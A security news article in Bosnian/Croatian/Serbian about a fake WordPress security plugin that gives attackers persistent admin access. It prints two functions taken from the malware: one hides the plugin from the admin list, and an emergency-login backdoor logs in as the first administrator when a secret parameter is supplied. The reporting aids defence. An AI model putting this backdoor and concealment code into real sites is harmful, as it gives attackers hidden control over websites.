Identifikovana je sofisticirana varijanta malicioznog softvera maskirana kao legitimni sigurnosni dodatak za WordPress, a sposobna je napadačima omogućiti stalan pristup kompromitovanim web stranicama.
Maliciozni kod se pojavljuje u sistemu datoteka pod bezopasnim imenima kao što su ‘WP-antymalwary-bot.php’ ili ‘wp-performance-booster.php’, stvarajući fasadu legitimnosti, a istovremeno skrivajući opasne mogućnosti, uključujući udaljeno izvršavanje koda, omogućavanje administratorskog pristupa i ubrizgavanje malicioznog koda.
Ovaj obmanjujući maliciozni softver sadrži nekoliko funkcija koje omogućavaju napadačima da održe pristup putem skrivenih vrata, daljinski izvršavaju proizvoljni kod i ubrizgavaju maliciozni JavaScript kod odgovoran za prikazivanje neželjenih oglasa.
Dizajn dodatka uključuje mehanizme za pingovanje Command & Control (C&C) servera, pružajući napadačima informacije u realnom vremenu o zaraženim stranicama i omogućavajući koordinirane napade na kompromitovanim platformama.
Istraživači Wordfencea identifikovali su maliciozni softver tokom rutinskog čišćenja stranice 22. januara 2025. godine, ističući njegovu neobičnu sofisticiranost i pažljiv napor da imitira legitimnu arhitekturu dodataka.
Sigurnosni tim je potom razvio potpise za detekciju i objavio ih premium korisnicima do 24. januara, dok bi korisnici besplatne verzije trebali dobiti zaštitu do 23. maja 2025. godine.
Podmukla priroda zlonamjernog softvera leži u njegovoj sposobnosti da ponovo zarazi web stranice čak i nakon prividnog uklanjanja.
Ovu postojanost postiže modifikacijom WordPress datoteke wp-cron.php, koja automatski ponovo instalira maliciozni dodatak ako se izbriše.
Ovo stvara izazovan scenario sanacije za administratore web stranica koji mogu vjerovati da su uspješno uklonili prijetnju.
Ono što ovu prijetnju čini posebno zabrinjavajućom je njena sposobnost komunikacije sa C&C serverom koji se nalazi na Kipru. Svake minute, zlonamjerni softver šalje URL zaražene stranice i vremensku oznaku, omogućavajući napadačima da ažuriraju popis kompromitovanih web stranica.
Sofisticirane tehnike izbjegavanja
Maliciozni softver koristi nekoliko metoda kako bi izbjegao otkrivanje, a najznačajnija je skrivanje od WordPress kontrolne ploče putem specijalizovanih funkcija: –
// Function to hide plugin from list
function hide_plugin_from_list($plugins) {
if (is_admin() && isset($plugins[plugin_basename(__FILE__)])) {
unset($plugins[plugin_basename(__FILE__)]);
}
return $plugins;
}
add_filter('all_plugins', 'hide_plugin_from_list');Ova obmana se proteže i na način na koji se dobija neovlašćeni pristup. Maliciozni softver implementira funkciju hitne prijave koja zaobilazi normalnu autentifikaciju korišćenjem unaprijed definisanog parametra lozinke.
Kada se aktivira, automatski dodjeljuje administratorske privilegije preuzimanjem prvog administratorskog računa koji pronađe: –
function emergency_login_all_admins() {
if (isset($_GET['emergency_login']) && $_GET['emergency_login'] === [REDACTED]) {
$admins = get_users(['role' => 'administrator']);
if (!empty($admins)) {
$admin = reset($admins);
wp_set_auth_cookie($admin->ID, true);
wp_redirect(admin_url());
exit;
}
}
}Izvor: CyberSecurityNews